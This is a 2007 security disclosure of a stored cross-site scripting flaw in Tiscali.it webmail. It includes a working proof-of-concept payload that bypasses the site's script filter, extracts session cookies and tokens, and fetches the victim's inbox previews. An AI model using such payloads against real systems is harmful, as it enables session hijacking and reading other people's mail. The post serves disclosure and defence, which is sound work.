<p><a href="http://Tiscali.it">Tiscali.it</a> (a large Italian ISP) webmail is affected by a severe vulnerability: in the email composer a user is allowed to insert a hyperlink, specifying<br>the link URL. This feature can be used to inject malicious HTML code into the form, allowing the execution of arbitrary script code in the victim's browser.
<br>Some security checks are performed on the submitted URL ("&lt;script", "script&gt;", "&lt;script&gt;", "javascript" and similar tokens are intercepted, but "&lt;script/xss&gt;" isn't...).
<br>So it is possible to find an XSS vector that gets past these checks; here is an example:</p>
<p>'';!--<XSS></A><script/xss><br>var c=document.cookie; alert(c);<br>s=c.substring(c.indexOf('ssoUser')+8,c.indexOf('ssoDomain')-2);alert(s);<br>t=c.substring(c.indexOf('ssoToken=')+9,
c.indexOf('ssoToken=')+21);alert(t); <br>mailurl=unescape('/cp/ps/Mail/EmailList?search=%26sh=%26d=tiscali.it%26fi=1%26sd=Desc%26an='+s+'%26l=it%26fp=INBOX%26sc=%26u='+s+'%26t='+t+'%26ss='
);<br>xmlhttp = new ActiveXObject('Msxml2.XMLHTTP'); <br>xmlhttp.open('GET',mailurl,true);<br>xmlhttp.onreadystatechange = checkData;<br>xmlhttp.send(null);<br>function checkData(){alert(xmlhttp.readyState
);if (xmlhttp.readyState == 4) { alert(xmlhttp.responseText); }}<br></script/xss> </p>
<p>When the email with the malicious link is opened by the victim (no interaction required), the following events occur:</p>
<div>- the cookie, username and sessionId are displayed in alert boxes<br>- using the cookie data, an XMLHttpRequest is made to the EmailList page, which contains previews of the first N e-mails in the victim's account (in the PoC I used INBOX, but any folder can be used)
<br>- the HTML content of the retrieved page is displayed in an alert box (inside its &lt;div-0&gt;..&lt;div-n&gt; tags the page contains the mail preview fields: "from", "subject", "date", etc.)</div>
<div> </div>
<div>Going further, it is also possible to:<br>- access the detailed content of each email<br>- access the victim's contacts<br>- load arbitrary pages in the mailList iframe (possible phishing) by setting the location.href attribute</div>
<p>All the retrieved information could easily be sent to a remote site, allowing the attacker to spy on the victim's mail activity.</p>
<div>Vuln discovered: 14/04/07<br>Vuln reported to portal owner 15/04/07 - No answer yet</div>
<div> </div>
<div>Greetings,</div>
<div>Rosario Valotta</div>
<div> </div>
<div>[rosario dot valotta at gmail dot com]</div>